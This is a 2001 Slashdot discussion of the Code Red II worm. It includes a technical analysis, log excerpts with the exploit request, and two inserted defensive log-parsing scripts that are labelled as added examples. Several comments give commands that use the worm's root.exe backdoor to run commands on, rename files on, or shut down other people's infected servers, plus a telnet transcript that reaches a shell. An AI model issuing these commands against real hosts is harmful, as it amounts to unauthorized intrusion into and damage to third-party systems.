Code Red Back For More

Brian Stretch writes: "The Code Red II worm was unleashed early this morning and appears to be very different than the original and far more dangerous. CR2 infected servers only attack servers within their Class A address block and their Class B address block in particular: since 9:11am EST I've logged 148 CR2 attack attempts, 89 of which are from within my Class B subnet, suggesting that only servers within Class A networks that were deliberately seeded are being attacked. The 24.x.x.x range is one of the hardest hit, and as before, it's folks with cable modems and DSL connections that are providing the most victims." Several @home customers have written about slowed service today, but they're definitely not alone.
  • I felt I was missing the fun... so I decided to open up a port on my firewall and check for some attack attempts...

    It took only ten minutes before /var/log/apache/access_log came up with:

    213.123.150.110 - - [05/Aug/2001:14:12:16 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281

    Blimey... 10 minutes! This thing is rife!!!

    And yes that machine is in the same class B network as myself. His ping time latency is over 500ms though... (that was at the time of the scan. Normal latency is around 20-50ms).
  • I've gone and hit the addresses showing up in my logs and I haven't seen the tell-tale 'Hacked by Chinese' message. Seems like the new Code Red also leaves the default site at the IP address alone, making it less obvious that a server is infected. Joy.
  • I'm still doubting if I will run something like this on my machines:

    tail -f /var/log/httpd/access_log|gawk '/default.ida/ {system("echo GET /scripts/root.exe?/c+ren+root.exe+root.exe-worm HTTP/1.0|nc "$1" 80")}'

    In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.

    Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...

    This root.exe might be a stepup for causing even more problems at a later time!

    Argh, that poses a bit of a moral dilemma for me...
    • Well, no that won't fix it completely - turns out there are a few virtual exploits they put in. From the recent analysis:

      Basically the above code creates a virtual web path (/c and /d) which maps /c to c:\ and /d to d:\. The writer of this worm has put in this functionality to allow for a backdoor to be placed on the system so even if you remove the root.exe (cmd.exe prompt) from your /scripts folder an attacker can still use the /c and /d virtual roots to compromise your system. The attacks would basically look like:

      http://IpAddress/c/inetpub/scripts/root.exe?/c+dir (if root.exe was still there) or:
      http://IpAddress/c/winnt/system32/cmd.exe?/c+dir Where dir could be any command an attacker would want to execute.

      As long as the trojan explorer.exe is running then an attacker will be able to remotely access your server.

      Man whoever did this put some thought into it.

  • by CodeRed ( 5676 ) on Sunday August 05, 2001 @01:00AM (#2110880) Journal
    Errrr.... More things named in my honor... This can't be good!

    If worms start popping up with Linux4Green (my ICQ nick) then I know I'm bad luck. :-P
    • I wish I could have a virus/worm named after me.
    • by Anonymous Coward
      At least your name isn't Michael Bolton!

      Your name is Michael Bolton? Wow, like the singer guy?
      Yes, and it's just a coincidence.
      So do you like his music?
    • FWIW, it's actually named by the guys who disassembled it after the yummy Mountain Dew beverage. From the bugtraq post:

      We've designated this the .ida "Code Red" worm, because part of the worm is
      designed to deface webpages with the text "Hacked by Chinese" and also
      because code red mountain dew was the only thing that kept us awake all last
      night to be able to disassemble this exploit.

  • A few more details (Score:5, Informative)

    by ryanr ( 30917 ) <ryan@thievco.com> on Sunday August 05, 2001 @01:00AM (#2110882) Homepage Journal
    It doesn't affect its own netspace exclusively. Initial analysis indicates that it will do so 6 out of 7 times. The 1 out of 7 will go outside its network range.

    We'll have full details posted to the Incidents [securityfocus.com] list shortly.
    • Took longer than expected (plus I slept a bit in there.. long night :) )

      http://www.securityfocus.com/archive/75/201878 [securityfocus.com]
      http://www.securityfocus.com/archive/75/201877 [securityfocus.com]
    • by Soko ( 17987 ) on Sunday August 05, 2001 @04:09AM (#2115402) Homepage
      From this thread [infopop.net] on Ars Technica [arstechnica.com]:
      Just discovered something interesting...

      telnet 80

      type GET /scripts/root.exe HTTP/1.0

      and you have a command prompt..

      Like this:
      [root@server httpd]# telnet 24.xxx.xxx.xxx 80
      Trying 24.xxx.xxx.xxx...
      Connected to 24.xxx.xxx.xxx.
      Escape character is '^]'.
      GET /scripts/root.exe HTTP/1.0

      HTTP/1.1 200 OK
      Server: Microsoft-IIS/5.0
      Date: Sun, 05 Aug 2001 07:45:08 GMT
      Content-Type: application/octet-stream
      Microsoft Windows 2000 [Version 5.00.2195]
      (C) Copyright 1985-1999 Microsoft Corp.

      c:\inetpub\scripts>

      [This message was edited by The_Hitman on August 05, 2001 at 03:56.]



      • I can't believe people trust their businesses to this crap. That's just too funny.
      • I found that you must do "GET /scripts/root.exe" without the HTTP/1.0 for it to work.

        Oh yeah, since you can't enter commands at the prompt you need to pass the commands to execute as arguments to root.exe (which is really cmd.exe). You can do this by typing "GET /scripts/root.exe?/C%20dir" or something like that. Or you could enter http://somehost/scripts/root.exe?/C%20dir into your favourite browser.

        I've found that typing absolute paths doesn't work for some reason, but http://somehost/scripts/root.exe?/C%20dir%20"..\.. \Documents%20and%20Settings\All%20Users\Desktop\" (remove the spaces) should bring you to the desktop.

        I wanted to leave a message to the admin on the desktop but I have no idea how to do that since "echo" is part of cmd.exe and piping probably won't work either. Perhaps someone with WinNT skills could offer some ideas?

  • I'm on a /128 cox at home subnet. It's normally very quiet on my subnet, but since this morning my firewall has been bouncing packets like crazy.

    I guess I'm going to have to put a packet sniffer on the other side of the wall and see what the hell is going on with this code red II.
  • by fanatic ( 86657 ) on Sunday August 05, 2001 @11:52AM (#2111855)
    ...Pick any one.
  • CodeRedNeck (Score:3, Interesting)

    by RoyalTS ( 162213 ) on Sunday August 05, 2001 @10:11AM (#2112215) Homepage
    Check out this heise.de article [heise.de] (in German, sorry)!!! Somebody apparently programmed a little Linux tool that may be able to slow the spread of the worm down a little. The idea was first introduced in the incidents.org forum [incidents.org]. May be worth a look.
  • Someone should tell all those idiots out there who pirate Windows 2000 that they should pirate "Windows 2000 Workstation" and not "Windows 2000 Server" because they're all going to get themselves own3d that way.
  • Of course... (Score:3, Insightful)

    by Jason W ( 65940 ) on Sunday August 05, 2001 @02:02AM (#2112471)
    If you get tired of seeing the requests, you could always shut the server down [securityfocus.com] (the requesting server of course, not yours :).

    Might not remove the worm, but at least gets the "admin" (ha) to pay some attention. Maybe make a request for YOU_HAVE_THE_CODE_RED_WORM_YOU_MORON.HTML right before you do it in case they check the logs :)

  • by Brian Stretch ( 5304 ) on Sunday August 05, 2001 @02:05AM (#2112517)
    It just occurred to me to look up the definition [wrq.com] of Class A/B/C addresses, and yup, I used the terms wrong in my story submission (argh!). What I meant to say was that when the worm generates addresses to scan, it appeared to always keep the first octet and a little over half the time (137 of 224 scans in my case) it keeps the second octet as well. That's no longer precisely true: I've since logged one scan from 152.72.x.x (grep XXXX access_log | grep -v 24.). And the high number of scans from within the first two octets may have more to do with that being a block of cable modem addresses rich in vulnerable IIS machines than anything else.

    And now we know these poor bastards have been rootkitted. There has to be a way to use this to warn them?
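
As an added example (not from the story submission or any comment in this thread), the check Brian describes, counting .ida probes and working out how many of the scanning sources share the first octet and the first two octets with the local address, can be done over an Apache access_log in a few lines of Python. The log lines below are constructed samples with the filler shortened from the real request, and the local address 24.10.77.1 is an assumed value:

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Constructed sample lines in Apache common log format (not real traffic).
# A real probe carries a few hundred bytes of filler; it is shortened here.
SAMPLE_LOG = """\
24.10.5.7 - - [05/Aug/2001:09:11:02 -0400] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 281
24.10.88.3 - - [05/Aug/2001:09:12:40 -0400] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 281
24.200.1.9 - - [05/Aug/2001:09:13:11 -0400] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 281
152.72.3.4 - - [05/Aug/2001:09:15:55 -0400] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 281
213.123.150.110 - - [05/Aug/2001:09:16:20 -0400] "GET /default.ida?NNNNNNNNNN%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 281
24.10.5.7 - - [05/Aug/2001:09:17:01 -0400] "GET /index.html HTTP/1.0" 200 1234
"""

# client ip, timestamp, method, path, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify_probe(path):
    """Return the worm variant a request path looks like, or None.

    Both worms hit /default.ida; the original pads the request with 'N',
    Code Red II pads it with 'X' (the 'XXXX' vs 'NNNN' people see in logs).
    """
    if not path.lower().startswith("/default.ida?"):
        return None
    filler = path[len("/default.ida?"):][:1]
    if filler == "X":
        return "Code Red II"
    if filler == "N":
        return "Code Red"
    return "unknown .ida probe"

def summarize(log_text, local_ip):
    """Count probes per variant and how local the scanning sources are."""
    local = ip_address(local_ip)
    same_a = ip_network(f"{local}/8", strict=False)    # shares the first octet
    same_b = ip_network(f"{local}/16", strict=False)   # shares the first two octets
    variants = Counter()
    sources = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, _ts, _method, path, _status = m.groups()
        variant = classify_probe(path)
        if variant is None:
            continue
        variants[variant] += 1
        sources.add(ip_address(src))
    return {
        "probes": sum(variants.values()),
        "by_variant": dict(variants),
        "sources": len(sources),
        "sources_same_first_octet": sum(1 for s in sources if s in same_a),
        "sources_same_two_octets": sum(1 for s in sources if s in same_b),
    }

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG, "24.10.77.1").items():
        print(f"{key}: {value}")
```

Run against a real access_log, the two "sources_same_*" counts against "sources" give the same ratio Brian and ryanr are estimating by hand above; the "by_variant" split separates the new worm's traffic from leftover probes by the original.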
  • This is a virus that installs a root kit. The question is, why? Clearly this is in preparation for a next phase. Sysadmins need to be thinking ahead on this.
  • It would be quite easy to shut down those PCs, if there were a "shutdown" command on NT/2k. There isn't; there is one in the Resource Kit but not in the default installation.

    Having said that, you could kill off a Windows PC by issuing

    GET /scripts/root.exe?/c+SHUTDOWN

    Other commands are possible as well: GET /scripts/root.exe?/c+dir+/s+\ gives you the recursive directory tree. Formatting, starting Fdisk and the like are possible, too.

    If someone could post a shutdown.exe somewhere, I'll be glad to provide a simple script that downloads the executable and starts it, thus stopping the IIS machine. Or maybe this is our chance to create Tuxissa :)

  • I'm gonna check the "well-known numbers" RFC, but I did a little scan of one of the infectoids:
    Ports open at:
    21
    25 (open mail relay too!)
    80
    135
    139
    443
    445
    1025
    1027
    2057
    2162
    2174
    2200
    2210
    2214
    2219
    2227
    2228
    2257
    2282

    I recognize some of those ports, but surely windows doesn't need all those ports open?

  • by MyMomIsALinuxHacker ( 469701 ) on Sunday August 05, 2001 @05:44AM (#2115962)
    Taken from http://www.securitynewsportal.com/article.php?sid=1354&mode=thread&order=0 [securitynewsportal.com]

    Code Red--the soda--has been spreading almost as fast as its namesake computer worm, which has infected hundreds of thousands of computers to date. The caffeine-laden, cherry-flavored version of its pale-yellow cousin, Mountain Dew, was released in May, months before the Code Red worm threatened to clog Internet traffic. And as computer security experts work to contain the damage from the Code Red worm, the soda's maker, Pepsi, is coincidentally featuring a "Crack the Code" contest on the Mountain Dew Web site.

    Code Red has been an especially big hit with computer programmers, who often guzzle the high-octane drink to fuel late-night code-writing sessions. Among the drink's fans were the staff of eEye Digital Security, who say they identified the Code Red worm and named it after their favorite soda.

    The rest of the story can be found on http://www.securitynewsportal.com/article.php?sid=1354&mode=thread&order=0 [securitynewsportal.com].

    It's funny. Laugh. Please?
  • The end is near... (Score:3, Insightful)

    by TrevorB ( 57780 ) on Sunday August 05, 2001 @12:07PM (#2118785) Homepage
    So let me get this straight... Every machine on the planet practically has a list of infected IP addresses broadcasted to them, with a new one arriving every minute or so (up to 663 XXX's here in the past two hours).

    So that means any loser with this list of infected IPs and some knowledge of perl literally has a small army of computers at their command?

    I think we might be seeing some rather impressive DDoS attacks by this evening.

    Hmm.. 3 more XXX's in the time it took me to write this... frequency's increasing...
  • by WereTiger ( 148010 ) <slashdot.weretiger@ca> on Sunday August 05, 2001 @01:59AM (#2119862) Homepage Journal
    Apparently @home is monitoring its customers for Code Red.
    I'd JUST reinstalled Win2k Pro on a new system, I'd added IIS for my own purposes and before I had a chance to run the service pack and patch, I got the Code Red worm (ok, so I was lazy and tired and was going to leave it for the morning).

    @home unbound my cablemodem until I'd cleared the worm (disable IIS, reboot).

    Normally, I'd be a little annoyed at @home for monitoring my connection and cutting my connection rather than just block all traffic to that IP at router level. But hey, it saved me from contributing to a problem.
    • by cybrthng ( 22291 ) on Sunday August 05, 2001 @02:39AM (#2121468) Homepage Journal
      You sure you just didn't dos yourself off the net? :)

      Personally I don't see @Home taking you off and noticing you fixed it and putting you back online.

      Check your outage listings for your area.


      • In my area, @home can't tell what's out. It takes many hours for an outage to make it onto "the board." If you call before this time, they will make you reboot the computer, reset the modem, etc etc. and then they will schedule a tech to come out. Because, again, let me repeat myself: they have no ability to monitor the network in real-time. I am convinced that "the board" only shows outage data that they collect from outraged customers.

        (side note: the idiot techs always make you reboot... even though the modem's ability to sync to the network has NOTHING TO DO with the kind of computer it is attached to, or even indeed if the computer is ON or OFF. Sigh.)

        @home is a freaking circus. A monkey house.

        I actually prefer it that way, they are apparently too dense to notice all the servers I run in violation of the TOS.
  • by 2675636B20796F75 ( 453183 ) on Sunday August 05, 2001 @06:25AM (#2121809)
    Ok, here's the latest on this new variant.

    1. It makes a copy of CMD.EXE called ROOT.EXE in the

    \inetpub\scripts

    and

    \program files\common files\system\msadc

    directories. Does this on both drive C: and D: (doesn't fail if D: doesn't exist).

    2. It then runs its attack program code to infect itself upon numerous other boxes. This is done randomly, although there is a bias to attack boxes that are part of the same class A as the infected attacker (so it hits your own boxes sooner rather than later). Attack code runs for 24 hours, 48 hours on Chinese language systems.

    3. After attack code runs (and it seems to be based on clock ticks, not date), it then writes out a Trojan.

    File Explorer.exe (8192 bytes or 7K as displayed by Windows) is dropped (from the code in the original attacking URL) to the root of drive C: and D: (again, doesn't matter if D: doesn't exist).

    4. The system is then rebooted (probably a forced reboot).

    5. When the system restarts, it loads the trojan Explorer.exe from the root directory on the boot drive. This code then does several things;

    a) Launches the real Explorer.exe, so the system looks normal.

    b) Sets SFCDisable in hklm\software\microsoft\windows nt\currentversion\winlogon to some undocumented value. Presumably this disables Windows File Protection (so critical files could be overwritten)

    c) Creates two virtual directories (via the registry) in hklm\system\currentcontrolset\services\w3svc\parameters\virtual roots. Called "C" and "D", they are mapped to the root directories of the two drives and permissions are established in the virtual directory to allow script, read, and write access as well as setting execute permissions to scripts and executables.

    d) Goes into an endless sleep loop.

    The end result of all of this action is to leave your box wide open to remote connection and total compromise.

    Unlike "Code Red", this worm doesn't attack any single target at any point, although its attack strength seems to be much higher (it launches 300 threads right off, although some may only launch 100), so its propagation seems much higher.

    The attack only works properly on Windows 2000 systems (preliminary analysis). ICSA Labs tested against an NT 4.0/IIS 4.0/SP3 box and received a standard error message. Reports from subscribers suggest that XP IIS 5.1 RC1 is invulnerable also. It's expected that it works on PWS and OWS equally to IIS (all on W2K).

    It's obviously a short-lived attack, at least the process of collecting victims. What would be done with them once collected is another story. No attempt is made by the worm to send anything "home", although detecting compromised boxes is far too easy (very unfortunately) for anyone outside your network.

    Cleaning a compromised box should really be done by reformatting. Although logging is left on for the new virtual directories created (meaning you'd see access in your IIS logs), there's really no way to be sure that files haven't been implanted to leave other backdoors (not as part of this worm, but as part of the use of the opening it creates).

    Credits:

    The bulk of the analysis was done by Nick Fitzgerald of Virus-L (and friends) and Roger Thompson of TruSecure. Additional help came from Bruce Hughes of the ICSA Labs.

    Cheers,
    Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
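
The analysis above notes that logging stays on for the C and D virtual roots the worm creates, so anyone using the opening shows up in the IIS logs. As an added example (not part of Russ's write-up or of the analysis he credits), here is a small checker for W3C extended IIS logs that flags the three request shapes this thread describes: .ida probes, hits on the copied root.exe under /scripts and /msadc, and requests through the /c/ and /d/ virtual roots. The log excerpt is constructed (TEST-NET addresses for the clients), and the column layout is taken from the log's own #Fields header rather than hard-coded:

```python
# Constructed IIS 5.0 W3C extended log excerpt (not from a real server).
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-08-05 14:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-08-05 14:01:10 10.0.0.5 GET /default.htm - 200
2001-08-05 14:02:33 203.0.113.9 GET /scripts/root.exe /c+dir 200
2001-08-05 14:03:01 203.0.113.9 GET /c/winnt/system32/cmd.exe /c+dir 200
2001-08-05 14:03:45 203.0.113.9 GET /D/inetpub/scripts/root.exe /c+dir 404
2001-08-05 14:04:12 10.0.0.9 GET /default.ida XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a 404
2001-08-05 14:05:00 198.51.100.7 GET /msadc/root.exe /c+dir 200
2001-08-05 14:06:30 10.0.0.5 GET /docs/readme.txt - 200
"""

def parse_w3c(log_text):
    """Yield one dict per entry, keyed by the names in the #Fields header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log entry seen before a #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue                    # truncated or garbled entry, skip it
        yield dict(zip(fields, values))

def classify(entry):
    """Return a rule name if the entry matches an indicator from the thread, else None.

    The worm probes /default.ida, copies cmd.exe to root.exe under /scripts and
    /msadc, and adds virtual roots C and D mapped to the drive roots, which is
    what makes paths like /c/winnt/system32/cmd.exe reachable. IIS paths are
    case-insensitive, so everything is compared in lower case.
    """
    stem = entry.get("cs-uri-stem", "").lower()
    if stem == "/default.ida":
        query = entry.get("cs-uri-query", "")
        return "code-red-ii-probe" if query.startswith("X") else "code-red-probe"
    if stem.startswith("/c/") or stem.startswith("/d/"):
        return "drive-virtual-root"
    if stem.endswith("/root.exe"):
        return "root.exe-backdoor"
    return None

def scan_iis_log(log_text):
    """Return (findings, backdoor_sources).

    findings: list of (time, client ip, rule, uri-stem) for matching entries.
    backdoor_sources: client ips that drove the backdoor. Probes are left out
    of that set: they come from other infected hosts, not from whoever is
    using this one.
    """
    findings = []
    sources = set()
    for entry in parse_w3c(log_text):
        rule = classify(entry)
        if rule is None:
            continue
        findings.append((entry["time"], entry["c-ip"], rule, entry["cs-uri-stem"]))
        if not rule.endswith("-probe"):
            sources.add(entry["c-ip"])
    return findings, sorted(sources)

if __name__ == "__main__":
    found, who = scan_iis_log(SAMPLE_IIS_LOG)
    for f in found:
        print(*f)
    print("backdoor used from:", ", ".join(who))
```

A 404 on a /c/ or /d/ path is still reported: the virtual roots only exist on a box the worm has already rebooted with its explorer.exe in place, so a request against them tells you someone expected the backdoor to be there even if the file they asked for was not.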

  • by cybrthng ( 22291 ) on Sunday August 05, 2001 @01:13AM (#2126423) Homepage Journal
    If there isn't one thing that can break the straw nothing will.

    I'm warned that smoking and drinking are bad for my health

    Medicines and drugs aren't legal unless they're fully tested and approved

    My car doesn't lock up and freeze

    My microwave doesn't blue screen and cook my brain inside out.

    SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be susceptible to cracks and attacks that are easily preventable.

    WHY do I have to pay extra for the functionality of NOT being susceptible to virii and net attacks?

    WHY doesn't microsoft NOTIFY me of the risks of using its OS?

    I hope no one's bank is trusting microsoft, I hope anyone doing online transactions doesn't trust microsoft. I hope no one keeps personal, private, confidential and financial data on their PCs.

    I hope no one running Windows is on the internet for that matter.

    • > My microwave doesn't blue screen and cook my brain inside out.
      >
      > SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be susceptible to cracks and attacks that are easily preventable.

      For his track record of trading security for market share, I'm just as happy as any Slashdotter to see Bill Gates' nuts roasted over a fire until they pop.

      But the fact is, your PC - whether it runs CP/M, BeOS, FreeBSD, Linux, or Windows XP - is fundamentally different from embedded systems like your microwave and your car.

      Design flaws can exist - in medicines, in consumer products, in closed-source applications, and yes, in open-source applications.

      The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.

      The reason it's "allowed" to crash is the same reason automobiles are "allowed" to crash -- sometimes it's a design flaw (Code Red IIS exploit, BIND exploit, Ford Pinto gas tank that exploded on rear impact), and sometimes it's operator error (SirCam worm, drunk driver).

      > I hope no one keeps personal, private, confidential and financial data on there pc's.

      The only truly secure machine is the one that's been unplugged, powered down, encased in concrete, wrapped up in a Faraday cage, and then dropped into the Marianas Trench. Ya gotta do what ya gotta do.

      • by IronChef ( 164482 ) on Sunday August 05, 2001 @04:17AM (#2112766)

        Unlike a car that explodes due to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.
    • WHY do I have to pay extra for the functionality of NOT being susceptible to virii and net attacks?

      Actually, you don't. Linux is free :-p
    • This won't break Microsoft's back .... consumers voting with their feet can only achieve that end.

      Recently I was looking around for a new insurance company. Looking on the web I came across a couple of companies who would give me a quote if I provided them with some personal information. I was all set to deal with one site, whom I won't name, but I decided to first do a quick background check on them. Using netcraft [netcraft.com] I was able to tell they were running their site on IIS. That little bit of info told me that they weren't at all serious about keeping my personal information confidential.

      Of course I decided not to pursue any business with them. But I also went a step further. I wrote them a quick email informing them that I would never do business with a company who was choosing to base their internet business on the most hacked application platform on the internet [attrition.org].

      Let companies know that you won't do business with them if they use inferior products. Your quick and simple message to them will speak more loudly than a thousand rants on various message boards.

  • by mcleodnine ( 141832 ) on Sunday August 05, 2001 @01:11AM (#2126740)

    Seeing a lot of "XXXX" and far fewer "NNNN" in the logs. This version appears to stay crunchier in milk than the first. Up to 25-30 per hour, from 10 this afternoon. The 24.x.x.x may be getting slammed, but I can see another that is just as bad.

    Snipped from incidents dot org (emphasis added)
    Both Henk Wevers and corecode submitted packet traces of the complete request as shown below. Comparing this trace with the original Code Red (see the Code Red Infection Illustrated section of the July 23 Handler's Diary at: http://www.incidents.org/diary/july2001.php) it is immediately obvious that we are dealing with a new worm. Note that line 820 shows that the worm is doing something with CMD.EXE; also the dump contains the string 'CodeRedII' on line 230. Note the references to root.exe on lines 840 and 880.

    Article also mentions that it appears the compromised servers are backdoored and rooted. Ouch.

    The editorial accusations of crying wolf might look a little pale this evening...

    • by Eeeeegon ( 71595 ) on Sunday August 05, 2001 @02:50AM (#2118690) Journal
      This worm is combining TWO worms; both the Code Red worm we know and love, and the less-recent SANDMIND worm (sp?), famous for running of DOS commands and posting an anti-US webpage at 'default.asp', 'default.html', 'index.asp', and 'index.html' on directories relative to the website root. Apparently this worm is using 'cmd.exe' to get root access; what it does beyond that, I have no idea... I haven't been hit by it. I guess the logic is .... if the box isn't patched against Code Red, chances are it isn't patched against SANDMIND, too.

      Also, 90% of the 'NNNN's in my server logs came from my Class A subnet (and much more frequently than the 'XXXXX' requests).

      Logs available upon request, etc.
  • by cyberdonny ( 46462 ) on Sunday August 05, 2001 @03:03AM (#2126953)
    From the article [unixwiz.net]:

    In particular, the fact that it has "CodeRedII" inside means that it couldn't possibly be the original worm -- the name wasn't attached until after it was released.

    If this beast is truly wicked, it will scan assorted websites such as Slashdot, Wired, etc, and as soon as it will see talk about itself [slashdot.org] it will enter its active phase...

  • by Simon Brooke ( 45012 ) <stillyet@googlemail.com> on Sunday August 05, 2001 @12:10PM (#2127197) Homepage Journal
    I wrote the following shell script to mail webmasters on infected hosts:
    #!/bin/bash

    # OK: the rationale behind this is that it will lookup the name of each host
    # which probes us with the Code Red style probe, and then see whether that
    # name resolves back to the number. If it does there's some hope that it's a
    # real host, so we'll try to mail webmaster@

    log=$HOME/codered.log
    touch "$log"      # so the grep below has something to read on the first run

    # one entry per probing address, however many times it hit us
    for ip in $(grep default.ida /var/log/httpd/access_log | awk '{print $1}' | sort -u)
    do
        if grep -qxF "$ip" "$log"
        then
            continue      # already dealt with this one
        fi
        echo "$ip" >> "$log"      # remember so we don't mail them again

        valid=""      # reset per host; otherwise a stale value could match a later $ip

        # reverse lookup: the PTR name for the address, trailing dot stripped
        host=$(dig -x "$ip" +short | tail -1 | sed 's/\.$//')

        echo -n "Seen $ip [$host]"

        # only go on if the answer looks like a hostname at all
        if echo "$host" | grep -q '^[a-z0-9.-]\{1,\}$'
        then
            echo -n "...appears to be valid..."

            # forward lookup: does the name come back to the same address?
            valid=$(dig "$host" A +short | tail -1)
        fi

        if [ "$ip" = "$valid" ]
        then
            mail -s "Your machine appears to be infected by Code Red" \
                "webmaster@$host" <<EOF

    Dear Webmaster

    We have received a request for 'default.ida' from your server at
    $ip. This is usually an indication that you have been
    infected by the 'Code Red' or 'Code Red II' worm, currently
    attacking Microsoft IIS servers. To secure your server, download
    and install the appropriate patch from Microsoft


    * Windows NT 4.0:
    http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833

    * Windows 2000:
    http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800

    Or, better still, switch to a proper operating system
    EOF
            echo " ...mailed"
        else
            echo " ? not valid?"
        fi
    done

    I've been hit by 61 different unique IP's today, of which 17 had IPs which resolved to addresses which resolved to the same IPs. So how many of my mails were actually accepted for delivery?

    That's right, none.

  • logs (Score:5, Interesting)

    by Kryptolus ( 238444 ) on Sunday August 05, 2001 @12:53AM (#2128143) Homepage
    automatically generated list of attacks against my server [kryptolus.com]

    147 attacks so far

    the page is generated through a perl script that reads my apache logs
  • by stuccoguy ( 441799 ) on Sunday August 05, 2001 @02:09AM (#2128303)
    This guy's computer is infected and attacking me every 10 minutes or so. I went to his web page and found this [66.1.83.146] resume which indicates the guy is a Windows2000 expert and Network Technician!
  • by weave ( 48069 ) on Sunday August 05, 2001 @06:33AM (#2129723) Journal
    With this high a number of scans it is now suicidal to install IIS while connected to the net. Chances are very good that your box will get compromised before you have a chance to apply the patch, even if you do so right away. And since people can easily set up a reverse hack to automatically do other nasty stuff to your box after THEY get probed, the risk is even higher.

    Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.

    • Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.

      Interesting dilemma... how exactly are these people going to get the patches to be installed with the system unplugged? Microsoft is going to have to release a patch CD.
  • by nebby ( 11637 ) on Sunday August 05, 2001 @04:04AM (#2135887) Homepage
    Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.

    I'm also guessing that right now a bunch of /.'ers are doing one of two things:

    1) Writing scripts to make things suck more for those who have been compromised (shame on you)
    or
    2) Writing scripts to fix the compromised servers

    I propose that if a script is created to fix these servers (Code Green? :)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmins and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and an even more malicious virus (which say, deletes the entire contents of the drives or something) will be unleashed soon enough.

    So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.

    Thanks.
    • by startled ( 144833 ) on Sunday August 05, 2001 @02:49PM (#2128790)
      Bah, what a waste. Screw that, here are some other things you should do along with your white hat program:

      1. Distribute Elcomsoft's e-book reader to all compromised boxes; search for any Adobe e-books and write out a plaintext copy.
      2. Append the code to DeCSS to all Word documents on the box.
      3. Modify the code to only patch the box when Dmitry is finally released from jail.
      4. Install Linux; reboot.
      5. Install BSD; reboot.
      6. Configure box to DoS MS's IIS patch servers; condemn MS for making patches inaccessible.
      7. Script all boxes to respond to /. stories with one of two comments: "dammit, this is a duplicate! Here is the original at goatse.cx", or "Katz iz 4 t00l!!!1@".
      8. Install SETI; add the box to your team; brag about your high score.

      Note: these are jokes. Please, please, do not do these things. Especially because if you do, the feds will come knocking on my door. :)
  • Why don't they... (Score:4, Insightful)

    by Greyfox ( 87712 ) on Sunday August 05, 2001 @01:13AM (#2138054) Homepage Journal
    Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...
    • by rawg ( 23000 )
      This will not work. How is your worm going to spread if you fix the system?
      • Easy. Make it so it isn't a true "worm".

        Make it so it patches against the exploit, then routes all attempted re-exploitation to a small CGI that uses the backdoor to disinfect the attacking system, and install the countermeasure.

        So...assuming you're getting hit with 30 requests an hour from 30 different IPs -- and each of those 30 is getting hit the same way -- the "fix" could propagate itself like wildfire, without being an "active" worm (seeking out hosts to disinfect), but instead being a "passive" worm (waiting for an infected computer to contact it, then disinfecting that computer, and passing on the "passive" disinfector).

        Problem being, it's still modifying the data on someone else's computer, without their knowledge or permission. I believe that makes it illegal -- even if it is working for "good" rather than for "evil".
    • by tswinzig ( 210999 ) on Sunday August 05, 2001 @02:47AM (#2121317) Journal
